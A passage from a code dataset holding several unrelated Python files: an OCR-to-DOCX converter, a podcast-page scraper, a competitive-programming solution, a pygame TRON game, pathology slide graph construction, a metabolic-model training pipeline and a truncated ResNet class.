progress spinner.\"\"\"\n self.progress.stop()\n","repo_name":"fuzzylabs/matcha","sub_path":"src/matcha_ml/cli/ui/spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"56"} +{"seq_id":"23655328863","text":"import os\nfrom copy import deepcopy\nimport shutil\nfrom docx import Document\nfrom docx import shared\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.enum.section import WD_SECTION\nfrom docx.oxml.ns import qn\nfrom docx.enum.table import WD_TABLE_ALIGNMENT\n\nfrom structure.recovery.table_process import HtmlToDocx\n\nfrom utils.logging import get_logger\nlogger = get_logger()\n\n\ndef convert_info_docx(img, res, save_folder, img_name):\n figure_dir = 'static/output/figure/'\n for filename in os.listdir(figure_dir):\n file_path = os.path.join(figure_dir, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n doc = Document()\n doc.styles['Normal'].font.name = 'Times New Roman'\n doc.styles['Normal']._element.rPr.rFonts.set(qn('w:eastAsia'), u'宋体')\n doc.styles['Normal'].font.size = shared.Pt(6.5)\n html_file = open('static/output/html/docx_output.html', 'w', encoding='utf8')\n # text_file.write(text)\n\n flag = 1\n for i, region in enumerate(res):\n img_idx = region['img_idx']\n if flag == 2 and region['layout'] == 'single':\n section = doc.add_section(WD_SECTION.CONTINUOUS)\n section._sectPr.xpath('./w:cols')[0].set(qn('w:num'), '1')\n flag = 1\n elif flag == 1 and region['layout'] == 'double':\n section = doc.add_section(WD_SECTION.CONTINUOUS)\n section._sectPr.xpath('./w:cols')[0].set(qn('w:num'), '2')\n flag = 2\n\n if region['type'].lower() == 'figure':\n excel_save_folder = os.path.join(save_folder, img_name)\n img_path = os.path.join(excel_save_folder,\n '{}_{}.jpg'.format(region['bbox'], img_idx))\n shutil.copy2(img_path, figure_dir)\n \n html_img_path = '../figure/' + img_path.split('/')[-1]\n paragraph_pic = doc.add_paragraph()\n paragraph_pic.alignment = WD_ALIGN_PARAGRAPH.CENTER\n run = paragraph_pic.add_run(\"\")\n if flag == 1:\n run.add_picture(img_path, width=shared.Inches(5))\n elif flag == 2:\n run.add_picture(img_path, width=shared.Inches(2))\n html_line = ''.format(html_img_path)\n html_file.write(html_line)\n elif region['type'].lower() == 'title':\n doc.add_heading(region['res'][0]['text'])\n html_line = '

{}

'.format(region['res'][0]['text'])\n html_file.write(html_line)\n elif region['type'].lower() == 'table':\n parser = HtmlToDocx()\n parser.table_style = 'TableGrid'\n parser.handle_table(region['res']['html'], doc)\n html_file.write(region['res']['html'])\n else:\n paragraph = doc.add_paragraph()\n paragraph_format = paragraph.paragraph_format\n text_line = ''\n for i, line in enumerate(region['res']):\n if i == 0:\n paragraph_format.first_line_indent = shared.Inches(0.25)\n text_run = paragraph.add_run(line['text'] + ' ')\n text_line = text_line + line['text'] + ' '\n text_run.font.size = shared.Pt(10)\n if len(line['text']) > 5:\n html_line = '

{}

'.format(text_line)\n html_file.write(html_line)\n text_line = ''\n table_style = \"\"\n html_file.write(table_style) \n html_file.close()\n # save to docx\n docx_save_path = os.path.join(save_folder, img_name)\n docx_path = os.path.join(docx_save_path, '{}_ocr.docx'.format(img_name))\n doc.save(docx_path)\n logger.info('docx save to {}'.format(docx_path))\n return docx_path\n\n\ndef sorted_layout_boxes(res, w):\n \"\"\"\n Sort text boxes in order from top to bottom, left to right\n args:\n res(list):structure results\n return:\n sorted results(list)\n \"\"\"\n num_boxes = len(res)\n if num_boxes == 1:\n res[0]['layout'] = 'single'\n return res\n\n sorted_boxes = sorted(res, key=lambda x: (x['bbox'][1], x['bbox'][0]))\n _boxes = list(sorted_boxes)\n\n new_res = []\n res_left = []\n res_right = []\n i = 0\n\n while True:\n if i >= num_boxes:\n break\n if i == num_boxes - 1:\n if _boxes[i]['bbox'][1] > _boxes[i - 1]['bbox'][3] and _boxes[i][\n 'bbox'][0] < w / 2 and _boxes[i]['bbox'][2] > w / 2:\n new_res += res_left\n new_res += res_right\n _boxes[i]['layout'] = 'single'\n new_res.append(_boxes[i])\n else:\n if _boxes[i]['bbox'][2] > w / 2:\n _boxes[i]['layout'] = 'double'\n res_right.append(_boxes[i])\n new_res += res_left\n new_res += res_right\n elif _boxes[i]['bbox'][0] < w / 2:\n _boxes[i]['layout'] = 'double'\n res_left.append(_boxes[i])\n new_res += res_left\n new_res += res_right\n res_left = []\n res_right = []\n break\n elif _boxes[i]['bbox'][0] < w / 4 and _boxes[i]['bbox'][2] < 3 * w / 4:\n _boxes[i]['layout'] = 'double'\n res_left.append(_boxes[i])\n i += 1\n elif _boxes[i]['bbox'][0] > w / 4 and _boxes[i]['bbox'][2] > w / 2:\n _boxes[i]['layout'] = 'double'\n res_right.append(_boxes[i])\n i += 1\n else:\n new_res += res_left\n new_res += res_right\n _boxes[i]['layout'] = 'single'\n new_res.append(_boxes[i])\n res_left = []\n res_right = []\n i += 1\n if res_left:\n new_res += res_left\n if res_right:\n new_res += res_right\n return new_res\n","repo_name":"quangduy392/FSIE","sub_path":"structure/recovery/recovery_to_doc.py","file_name":"recovery_to_doc.py","file_ext":"py","file_size_in_byte":6381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10880268562","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 28 20:42:34 2021\n\n@author: wengliangchong\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport pandas as pd\n\ndef to_int(value):\n if 'K' in value:\n return(int(float(value.replace('K', ''))*1000))\n elif 'M' in value:\n return(int(float(value.replace('M', ''))*1000000))\n elif 'B' in value:\n return(int(float(value.replace('B', ''))*1000000000))\n else:\n return(int(value))\n\ndef scrape(link):\n try:\n page = requests.get(link, timeout=20)\n soup = BeautifulSoup(page.content, \"lxml\")\n try:\n title = soup.find('h1').find('span').text.strip()\n except Exception:\n print(\"Missing title: \", link)\n title = \"\"\n try:\n producer = soup.find('h1').find('a').text.strip()\n except Exception:\n try:\n producer = soup.find('h1').find('span', class_='product-header__identity podcast-header__identity').text.strip()\n except Exception:\n print(\"Missing producder: \", link)\n producer = \"\"\n try:\n genre = soup.find('li', class_='inline-list__item inline-list__item--bulleted').text.strip()\n except Exception:\n print(\"Missing genre: \", link)\n genre = \"\"\n try:\n rating = float(soup.find('span', class_=\"we-customer-ratings__averages__display\").text.strip())\n except Exception:\n print(\"Missing rating: \", link)\n rating = 0.0\n try:\n num_ratings = to_int(soup.find('div', class_=\"we-customer-ratings__count small-hide medium-show\").text.strip().strip('Ratings'))\n except Exception:\n print(\"Missing number of ratings: \", link)\n num_ratings = 0\n try:\n num_episodes = int(soup.find('div', class_=\"product-artwork__caption small-hide medium-show\").text.strip().strip('episodes').replace(',', ''))\n except Exception:\n print(\"Missing number of episodes: \", link)\n num_episodes = 0\n try:\n description = soup.find('div', class_=\"product-hero-desc product-hero-desc--spacer-bottom-large product-hero-desc--side-bar\").text.strip()\n except Exception:\n print(\"Missing description: \", link)\n description = \"\"\n except Exception:\n print(\"Link not working:\", link)\n details = {\n 'title': title,\n 'producer': producer,\n 'genre': genre,\n 'rating': rating,\n 'num_ratings': num_ratings,\n 'num_episodes': num_episodes,\n 'description': description\n }\n return details\n\npodcasts_dict = []\ncounter = 1\n\n\"\"\"\nwith open('all_podcast_links.json') as file:\n links = json.load(file)\n for link in links:\n try:\n podcast_info = scrape(link)\n podcast_info['link'] = link\n podcasts_dict.append(podcast_info)\n if counter % 50 == 0:\n print(counter, 'podcasts done.')\n counter += 1\n except Exception:\n print(link, 'failed.')\n counter += 1\n pass\n\nwith open('./data/json/podcast_info.json', 'w') as outfile:\n json.dump(podcasts_dict, outfile)\n\"\"\"\n\nwith open('../data/json/podcast_info.json') as file:\n podcasts = json.load(file)\n\ndf = pd.DataFrame(podcasts)\nmissing_df = df[df['title'].values == '']\n\nfor index, row in missing_df.iterrows():\n try:\n podcast_info = scrape(row.link)\n podcast_info['link'] = row.link\n podcasts_dict.append(podcast_info)\n print(counter, 'podcasts done.')\n counter += 1\n except Exception:\n print(row.link, 'failed.')\n counter += 1\n pass\n\nwith open('../data/json/podcast_info_add.json', 'w') as outfile:\n json.dump(podcasts_dict, outfile)\n\n","repo_name":"Peter-Chong/Podcast-Recommendation-System","sub_path":"scraper/podcast_info_scraper.py","file_name":"podcast_info_scraper.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"72863068334","text":"def binary_search(end, arr, val):\n start = 0\n while(start<=end):\n mid = int((start+end)/2)\n if arr[mid]>val:\n ans = mid\n end = mid-1\n else:\n start = mid+1\n return ans\n \nT = int(input())\nfor i in range(T):\n N = int(input())\n A = list(map(int, input().split()))\n stack = []\n stack.append(A[0])\n for j in range(1, N):\n if stack[-1]>A[j]:\n stack[binary_search(len(stack)-1,stack, A[j])] = A[j]\n else:\n stack.append(A[j])\n print(len(stack), *stack)","repo_name":"hhhrrrttt222111/CodeChef","sub_path":"Easy/Stacks of Disc/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"56"} +{"seq_id":"41930449045","text":"\"\"\"\"TRON\r\n\r\nDeux motos génèrent des traces derrière eux, et qui ne peut pas être franchi \r\n\r\nLa trace est représenter\r\n\r\n\"\"\"\r\nfrom dis import dis\r\nimport os\r\nimport pygame\r\nimport math\r\npygame.init()\r\nos.chdir('assets')\r\nmoto1image = pygame.image.load('Player1.png')\r\nmoto2image = pygame.image.load('Player2.png')\r\nclock = pygame.time.Clock()\r\n\r\npygame.display.set_caption(\"TRON\", 'moto.png')\r\nscreen = pygame.display.set_mode((500, 500))\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n \r\n self.moto1 = Moto(moto1image,50 - moto1image.get_width() / 2,screen.get_height() / 2 - moto1image.get_height() / 2,[pygame.K_d,pygame.K_a,pygame.K_s,pygame.K_w],(255,0,0),180,\"red\")\r\n self.moto2 = Moto(moto2image,screen.get_width() - 50 - moto1image.get_width() / 2,screen.get_height() / 2 - moto1image.get_height() / 2,[pygame.K_RIGHT,pygame.K_LEFT,pygame.K_DOWN,pygame.K_UP],(0,0,255),0,\"blue\")\r\n\r\ndef dist(xa,ya,xb,yb):\r\n return math.sqrt((xb - xa)**2 + (yb - ya)**2)\r\n\r\nclass Moto(pygame.sprite.Sprite):\r\n def __init__(self,img,posx,posy,touches,couleur,rotation,name):\r\n super().__init__()\r\n self.name = name\r\n self.health = 1\r\n self.max_health = 1\r\n self.velocity = 2\r\n self.base_image = img\r\n self.image = pygame.transform.rotate(self.base_image,rotation)\r\n self.rect = self.image.get_rect()\r\n self.rect.x = posx\r\n self.rect.y = posy\r\n self.dir = (0,0)\r\n if rotation == 0:\r\n self.dir = (-1,0)\r\n elif rotation == 180:\r\n self.dir = (1,0)\r\n self.line_points = [self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2]\r\n self.line_rect = []\r\n self.touches = touches\r\n self.color = couleur\r\n\r\n self.points = [self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2]\r\n self.maxpoints = 30\r\n self.d_entre_pts = 1\r\n self.points_distance = 1\r\n self.point_connecte = []\r\n def left(self):\r\n if self.dir == (-1,0):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 0)\r\n rect_b = self.image.get_rect()\r\n \r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(0,1),(0,-1))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (-1,0)\r\n\r\n def down(self):\r\n if self.dir == (0,-1):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 90)\r\n rect_b = self.image.get_rect()\r\n\r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(1,0),(-1,0))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (0,-1) \r\n\r\n def right(self):\r\n if self.dir == (1,0):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 180)\r\n rect_b = self.image.get_rect()\r\n\r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(0,1),(0,-1))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (1,0)\r\n\r\n def up(self):\r\n if self.dir == (0,1):\r\n return\r\n self.line_points += self.rect.x + self.image.get_width() / 2, self.rect.y + self.image.get_height() / 2\r\n rect_a = self.image.get_rect()\r\n self.image = pygame.transform.rotate(self.base_image, 270)\r\n rect_b = self.image.get_rect()\r\n\r\n if rect_a != rect_b:\r\n pos = pos_apres_rot(self.dir,self.image,(1,0),(-1,0))\r\n self.rect.x += pos[0]\r\n self.rect.y += pos[1]\r\n self.dir = (0,1)\r\n\r\n def moto_controller(self,event):\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == self.touches[0]:\r\n self.right()\r\n elif event.key == self.touches[1]:\r\n self.left()\r\n elif event.key == self.touches[2]:\r\n self.down()\r\n elif event.key == self.touches[3]:\r\n self.up() \r\n def move(self):\r\n self.rect.x += self.dir[0] * self.velocity\r\n self.rect.y -= self.dir[1] * self.velocity\r\n screen.blit(self.image, self.rect)\r\n\r\n def draw_trail(self):\r\n self.line_rect.clear()\r\n if dist(self.points[-2],self.points[-1],self.rect.x + self.image.get_width() / 2,self.rect.y + self.image.get_height() / 2) > self.d_entre_pts:\r\n if int(len(self.points) / 2) >= self.maxpoints:\r\n del self.points[0]\r\n del self.points[0]\r\n self.points.append(self.rect.x + self.image.get_width() / 2)\r\n self.points.append(self.rect.y + self.image.get_height() / 2)\r\n if int(len(self.points)) > 4:\r\n for i in range(0,int(len(self.points)) - 4,2):\r\n pygame.draw.line(screen,self.color,(self.points[i],self.points[i+1]),(self.points[i+2],self.points[i+3]),1)\r\n for i in range(0,int(len(self.line_points)),2):\r\n pygame.draw.circle(screen,self.color,(self.line_points[i],self.line_points[i+1]),2)\r\n \r\n coins_possibles = []\r\n for i in range(0,int(len(self.line_points)),2):\r\n if self.check_coin(self.line_points[i],self.line_points[i+1]) == True or self.point_connecte.count(i) > 0:\r\n coins_possibles.append(self.line_points[i])\r\n coins_possibles.append(self.line_points[i+1])\r\n for i in range(0,int(len(coins_possibles)) - 3,2):\r\n self.line_rect += pygame.draw.line(screen,self.color,(coins_possibles[i],coins_possibles[i+1]),(coins_possibles[i+2],coins_possibles[i+3]),5)\r\n if(self.point_connecte.count(i) == 0):\r\n self.point_connecte.append(i)\r\n\r\n if(len(coins_possibles)) > 1:\r\n self.line_rect += pygame.draw.line(screen,self.color,(coins_possibles[-2],coins_possibles[-1]),(self.points[0],self.points[1]),5)\r\n\r\n def check_coin(self,posx,posy):\r\n for i in range(0,int(len(self.points)),2):\r\n if not dist(posx,posy,self.points[i],self.points[i+1]) > self.points_distance:\r\n return False\r\n return True\r\n \r\n def get_collision(self):\r\n collisions.extend(self.line_rect)\r\n \r\n def apply_collision(self):\r\n hit_list = []\r\n for i in range(0,int(len(collisions)),4):\r\n rect = pygame.Rect(collisions[(i):(i+4)])\r\n if(self.rect.colliderect(rect)):\r\n hit_list.append(rect)\r\n if len(hit_list) != 0:\r\n print(self.name,\"COLLISION\")\r\ndef pos_apres_rot(dirbase,image,dir1,dir2):\r\n pos = [0,0]\r\n if(dirbase == dir1 or dirbase == dir2):\r\n pos[0] -= image.get_width() / 2 - image.get_height() / 2\r\n pos[1] += image.get_width() / 2 - image.get_height() / 2\r\n return pos\r\n\r\ndef fond(image):\r\n # /!\\ il faut que la largeur et longueur de la fenetre soit un multiple de 100 car le fond fait 100x100 px\r\n nb_x = int(screen.get_width() / 100)\r\n nb_y = int(screen.get_height() / 100)\r\n\r\n for x in range(nb_x):\r\n for y in range(nb_y):\r\n screen.blit(image, (x * 100, y * 100))\r\n\r\nson = pygame.mixer.Sound('music/music_TRON.wav')\r\nson.set_volume(0.1)\r\nson.play(loops=-1, maxtime=0, fade_ms=0)\r\n\r\nbg = pygame.image.load('bg.png')\r\ngame = Game()\r\nrunning = True\r\nwhile running:\r\n fond(bg)\r\n for event in pygame.event.get():\r\n game.moto1.moto_controller(event)\r\n game.moto2.moto_controller(event)\r\n if event.type == pygame.QUIT:\r\n run = False\r\n pygame.quit()\r\n game.moto1.draw_trail()\r\n game.moto2.draw_trail()\r\n game.moto1.move()\r\n game.moto2.move()\r\n collisions = []\r\n game.moto1.get_collision()\r\n game.moto2.get_collision()\r\n game.moto1.apply_collision()\r\n game.moto2.apply_collision()\r\n pygame.display.update() \r\n clock.tick(60)","repo_name":"Arthur9876/oc-2021","sub_path":"src/projet/projet4/TRON.py","file_name":"TRON.py","file_ext":"py","file_size_in_byte":8410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"56"} +{"seq_id":"39787387908","text":"# ***** BEGIN GPL LICENSE BLOCK *****\r\n#\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software Foundation,\r\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n#\r\n# The Original Code is Copyright (C) 2021, Wenqi Lu, Fayyaz Minhas, University of Warwick\r\n# All rights reserved.\r\n# ***** END GPL LICENSE BLOCK *****\r\n\r\nimport numpy as np\r\nimport os\r\nfrom scipy.spatial import Delaunay, KDTree\r\nfrom collections import defaultdict\r\nimport torch\r\nfrom torch.autograd import Variable\r\nfrom torch_geometric.data import Data\r\nfrom scipy.cluster.hierarchy import fcluster\r\nfrom scipy.cluster import hierarchy\r\nfrom sklearn.neighbors import KDTree as sKDTree\r\nfrom tqdm import tqdm\r\nimport pickle\r\nUSE_CUDA = torch.cuda.is_available()\r\n\r\ndef cuda(v):\r\n if USE_CUDA:\r\n return v.cuda()\r\n return v\r\n\r\ndef toTensor(v,dtype = torch.float,requires_grad = True): \r\n device = 'cuda:0' \r\n return (Variable(torch.tensor(v)).type(dtype).requires_grad_(requires_grad)).to(device)\r\n\r\ndef connectClusters(Cc,dthresh = 3000):\r\n tess = Delaunay(Cc)\r\n neighbors = defaultdict(set)\r\n for simplex in tess.simplices:\r\n for idx in simplex:\r\n other = set(simplex)\r\n other.remove(idx)\r\n neighbors[idx] = neighbors[idx].union(other)\r\n nx = neighbors \r\n W = np.zeros((Cc.shape[0],Cc.shape[0]))\r\n for n in nx:\r\n nx[n] = np.array(list(nx[n]),dtype = np.int)\r\n nx[n] = nx[n][KDTree(Cc[nx[n],:]).query_ball_point(Cc[n],r = dthresh)]\r\n W[n,nx[n]] = 1.0\r\n W[nx[n],n] = 1.0 \r\n return W # neighbors of each cluster and an affinity matrix\r\n\r\ndef toGeometric(X,W,y,tt=0): \r\n return Data(x=toTensor(X,requires_grad = False), edge_index=(toTensor(W,requires_grad = False)>tt).nonzero().t().contiguous(),y=toTensor([y],dtype=torch.long,requires_grad = False))\r\n\r\nif __name__ == '__main__':\r\n # similarity parameters\r\n lambda_d = 3e-3 \r\n lambda_f = 1.0e-3\r\n lamda_h = 0.8 # Hierachical clustering distance threshold\r\n distance_thres = 4000\r\n feature_path = './example' # load x, y coordinates and features of patches in each WSI\r\n output_path = './graphs'\r\n for filename in tqdm(os.listdir(feature_path)):\r\n print(filename)\r\n ofile = os.path.join(output_path, filename[:-4] + '.pkl')\r\n if os.path.isfile(ofile):\r\n continue\r\n label = int(1)\r\n if filename.endswith(\".npz\"):\r\n d = np.load(feature_path + '/' + filename, allow_pickle=True)\r\n x, y, F = d['x_patch'], d['y_patch'], d['feature']\r\n ridx = (np.max(F, axis=0) - np.min(F, axis=0)) > 1e-4 # remove feature which does not change\r\n F = F[:, ridx]\r\n C = np.asarray(np.vstack((x, y)).T, dtype=np.int)\r\n TC = sKDTree(C)\r\n I, D = TC.query_radius(C, r=6 / lambda_d, return_distance=True, sort_results=True)\r\n DX = np.zeros(int(C.shape[0] * (C.shape[0] - 1) / 2))\r\n idx = 0\r\n for i in range(C.shape[0] - 1):\r\n f = np.exp(-lambda_f * np.linalg.norm(F[i] - F[I[i]], axis=1))\r\n d = np.exp(-lambda_d * D[i])\r\n df = 1 - f * d\r\n dfi = np.ones(C.shape[0])\r\n dfi[I[i]] = df\r\n dfi = dfi[i + 1:]\r\n DX[idx:idx + len(dfi)] = dfi\r\n idx = idx + len(dfi)\r\n d = DX\r\n\r\n # %%\r\n Z = hierarchy.linkage(d, method='average')\r\n clusters = fcluster(Z, lamda_h, criterion='distance')\r\n uc = list(set(clusters))\r\n C_cluster = []\r\n F_cluster = []\r\n for c in uc:\r\n idx = np.where(clusters == c)\r\n if C[idx, :].squeeze().size==2:\r\n C_cluster.append(list(np.round(C[idx, :].squeeze())))\r\n F_cluster.append(list(F[idx, :].squeeze()))\r\n else:\r\n C_cluster.append(list(np.round(C[idx, :].squeeze().mean(axis=0))))\r\n F_cluster.append(list(F[idx, :].squeeze().mean(axis=0)))\r\n C_cluster = np.array(C_cluster)\r\n F_cluster = np.array((F_cluster))\r\n\r\n W = connectClusters(C_cluster, dthresh=distance_thres)\r\n G = toGeometric(F_cluster, W, y=label)\r\n G.coords = toTensor(C_cluster, requires_grad=False)\r\n\r\n with open(ofile, 'wb') as f:\r\n pickle.dump(G, f)\r\n\r\n","repo_name":"wenqi006/SlideGraph","sub_path":"features_to_graph.py","file_name":"features_to_graph.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"56"} +{"seq_id":"22785463563","text":"import os.path as osp\nfrom statistics import LinearRegression\nimport warnings\nimport random\n\nfrom upyog.util.system import makepath, get_files\nfrom upyog.util.types import build_fn\nfrom upyog.util.ml import get_data_dir\nfrom upyog.log import get_logger\nfrom upyog.const import CPU_COUNT\nfrom upyog._compat import iterkeys\nfrom upyog import parallel\n\nfrom cobra.io.web import load_model as load_gemm\nfrom cobra.io import read_sbml_model\nfrom cobra.util import linear_reaction_coefficients\nimport cobra\n\n# import deeply\n\nfrom dgemm import settings, __name__ as NAME\nfrom dgemm import settings # , dops\n\nwarnings.filterwarnings(\"ignore\")\n\nlogger = get_logger(NAME)\n\ncobra_config = cobra.Configuration()\n\nfrom deeply.integrations.imports import import_ds_module\n\ndfl = import_ds_module(\"pandas\")\nKFold = import_ds_module(\"sklearn.model_selection.KFold\")\ntrain_test_split = import_ds_module(\"sklearn.model_selection.train_test_split\")\n\ndef build_model(artifacts_path = None):\n encoder_dropout_rate = settings.get(\"encoder_dropout_rate\")\n encoder_batch_norm = settings.get(\"encoder_batch_norm\")\n decoder_dropout_rate = settings.get(\"decoder_dropout_rate\")\n decoder_batch_norm = settings.get(\"decoder_batch_norm\")\n\n gan = deeply.hub(\"gan\", x = 100,\n encoder_dropout_rate = encoder_dropout_rate,\n encoder_batch_norm = encoder_batch_norm,\n decoder_dropout_rate = decoder_dropout_rate,\n decoder_batch_norm = decoder_batch_norm\n )\n \n if artifacts_path:\n path_plot = osp.join(artifacts_path, \"model.png\")\n makepath(path_plot)\n gan.plot(to_file = path_plot)\n\n return gan\n\nMODELS = [{\n \"class\": import_ds_module(\"sklearn.linear_model.LinearRegression\"),\n \"name\": \"linear-regression\"\n}, {\n \"class\": import_ds_module(\"sklearn.gaussian_process.GaussianProcessRegressor\"),\n \"name\": \"gaussian-process-regressor\"\n}, {\n \"class\": import_ds_module(\"sklearn.ensemble.RandomForestRegressor\"),\n \"name\": \"random-forest-regressor\" \n}, {\n \"class\": import_ds_module(\"sklearn.svm.SVR\"),\n \"name\": \"support-vector-regressor\" \n}, {\n \"class\": import_ds_module(\"sklearn.neural_network.MLPRegressor\"),\n \"name\": \"mlp-regressor\",\n \"params\": {\n \"hidden_layer_sizes\": (100,),\n \"verbose\": True\n }\n}]\n\ndef _train_model_step(model_meta, X_train, X_test, Y_train, Y_test, **kwargs):\n model = model_meta[\"class\"](**model_meta.get(\"params\", {}))\n k_fold = kwargs.get(\"k_fold\", settings.get(\"k_fold\"))\n\n logger.info(\"Watching model: %s\" % model_meta[\"name\"])\n # dops.watch(model)\n\n logger.info(\"Training model: %s\" % model_meta[\"name\"])\n\n k_fold = KFold(n_splits = k_fold, shuffle = True)\n\n for i, (train_index, test_index) in enumerate(k_fold.split(X_train)):\n x_train, x_val = X_train.iloc[train_index], X_train.iloc[test_index]\n y_train, y_val = Y_train.iloc[train_index], Y_train.iloc[test_index]\n\n logger.info(\"Training fold %d/%d\" % (i + 1, k_fold.n_splits))\n\n model.fit(x_train, y_train)\n\n logger.info(\"Model: %s, Fold: %d, Score: %.4f\" % (\n model_meta[\"name\"], i, model.score(x_val, y_val) * 100))\n\n logger.success(\"Successfully trained model: %s\" % model_meta[\"name\"])\n\n logger.info(\"Evaluating model...\")\n\n score = model.score(X_test, Y_test)\n\n logger.success(\"Successfully evaluated model: %s with score: %.4f\" % (model_meta[\"name\"], score * 100))\n\ndef _train_step(csv_path, data_dir = None, objective = False, n_y = None, *args, **kwargs):\n data_dir = get_data_dir(NAME, data_dir)\n jobs = kwargs.get(\"jobs\", settings.get(\"jobs\"))\n minimized = kwargs.get(\"minimized\", False)\n\n logger.info(\"Training on CSV file: %s\" % csv_path)\n\n test_size = kwargs.get(\"test_size\", settings.get(\"test_size\"))\n\n df = dfl.read_csv(csv_path)\n\n logger.success(\"Loaded CSV file: %s\" % csv_path)\n\n logger.info(\"Splitting data into train and test sets...\")\n train_df, test_df = train_test_split(df, test_size = test_size)\n\n logger.success(\"Successfully split data into train and test sets.\")\n\n X_columns = [column for column in df.columns if \"flux\" not in column]\n y_columns = []\n \n if objective or n_y:\n model_id = osp.splitext(osp.basename(csv_path))[0]\n\n cobra_config.cache_directory = data_dir\n\n if minimized:\n path_model = osp.join(data_dir, \"%s_minimized.xml\" % model_id)\n model_gemm = read_sbml_model(path_model)\n else:\n model_gemm = load_gemm(model_id)\n\n logger.info(\"Loaded GEMM model: %s\" % model_id)\n\n if n_y:\n y_columns = list(set(df.columns) - set(X_columns))\n y_columns = random.sample(y_columns, int(len(y_columns) * n_y))\n\n if objective:\n objectives = linear_reaction_coefficients(model_gemm)\n objective = list(iterkeys(objectives))[0]\n\n y_columns += [\"%s_flux\" % objective.id]\n else:\n y_columns = list(set(df.columns) - set(X_columns))\n \n logger.info(\"Using n(y) columns: %s\" % len(y_columns))\n\n X_train, X_test, y_train, y_test = train_df[X_columns], test_df[X_columns], \\\n train_df[y_columns], test_df[y_columns]\n\n logger.info(\"Starting training...\")\n\n with parallel.no_daemon_pool(processes = jobs) as pool:\n fn = build_fn(_train_model_step, X_train = X_train, X_test = X_test,\n Y_train = y_train, Y_test = y_test, *args, **kwargs)\n list(pool.map(fn, MODELS))\n\ndef train(data_dir = None, artifacts_path = None, *args, **kwargs):\n logger.info(\"Initiating Training...\")\n\n logger.info(\"Storing artifacts at path: %s\" % artifacts_path)\n\n jobs = kwargs.get(\"jobs\", settings.get(\"jobs\"))\n\n data_dir = get_data_dir(NAME, data_dir)\n\n data_csv = get_files(data_dir, \"*.csv\")\n \n if len(data_csv) == 0:\n logger.warn(\"No CSV file found in directory: %s\" % data_dir)\n else:\n logger.info(\"Found %s CSV files\" % len(data_csv))\n\n with parallel.no_daemon_pool(processes = jobs) as pool:\n fn = build_fn(_train_step, data_dir = data_dir, *args, **kwargs)\n list(pool.map(fn, data_csv))","repo_name":"HelikarLab/DeepGEMM","sub_path":"src/dgemm/pipelines/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"22904902179","text":"import argparse\nimport numpy as np\nimport os\nimport random\nimport shutil\nimport time\nimport warnings\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torchvision.transforms as transforms\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.layers import ShapeSpec\nfrom detectron2.modeling.backbone import build_backbone\nfrom detectron2.modeling.roi_heads.box_head import build_box_head\n\nfrom wsl.config import add_wsl_config\n\n\nclass ResNet_WS(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n\n self.backbone = build_backbone(cfg)\n self.maxpool = nn.MaxPool2d(2, stride=2, padding=0)\n self.neck = build_box_head(\n cfg,\n ShapeSpec(channels=self.backbone.output_shape()[\"res5\"].channels, height=7, width=7),\n )\n\n input_size = self.neck.output_size\n if not isinstance(input_size, int):\n input_size = 